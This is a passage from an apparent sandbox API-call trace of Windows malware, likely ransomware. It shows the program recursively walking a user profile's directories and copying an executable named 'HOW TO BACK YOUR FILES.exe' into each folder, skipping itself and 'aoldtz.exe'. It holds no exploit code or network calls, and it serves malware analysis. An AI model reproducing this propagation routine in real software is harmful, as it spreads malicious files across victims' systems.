Data\\Application Data\\Application Data\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.871] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail" [0065.871] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.871] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.871] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.872] GetLastError () returned 0x0 [0065.872] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.872] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.872] CloseHandle (hObject=0x154) returned 1 [0065.872] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.872] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.872] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.872] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.872] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.872] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery" [0065.872] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.872] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.878] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.878] GetLastError () returned 0x0 [0065.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.878] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.878] CloseHandle (hObject=0x154) returned 1 [0065.878] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.878] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.879] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.879] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.879] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.879] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup" [0065.879] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.879] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.880] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.880] GetLastError () returned 0x0 [0065.880] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.880] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.880] CloseHandle (hObject=0x154) returned 1 [0065.880] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.880] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.881] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.881] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.881] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.881] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new" [0065.881] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.881] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.881] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.882] GetLastError () returned 0x0 [0065.882] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.882] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.882] CloseHandle (hObject=0x154) returned 1 [0065.882] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.882] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.882] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.882] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.882] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.883] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player" [0065.883] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.883] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.883] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.883] GetLastError () returned 0x0 [0065.883] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.883] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.883] CloseHandle (hObject=0x154) returned 1 [0065.884] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.884] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.884] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.884] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.884] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.884] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists" [0065.884] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.884] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.885] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.885] GetLastError () returned 0x0 [0065.885] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.885] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.885] CloseHandle (hObject=0x154) returned 1 [0065.885] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.885] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.885] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.885] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.885] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.885] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0065.885] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.885] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.886] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.886] GetLastError () returned 0x0 [0065.886] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.886] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.886] CloseHandle (hObject=0x154) returned 1 [0065.886] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.887] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.887] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.887] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.887] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.887] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0065.887] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.887] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.888] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.888] GetLastError () returned 0x0 [0065.888] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.888] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.888] CloseHandle (hObject=0x154) returned 1 [0065.888] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.888] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58646980, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58646980, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.888] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.888] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.889] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.889] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0065.889] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.889] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.889] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), 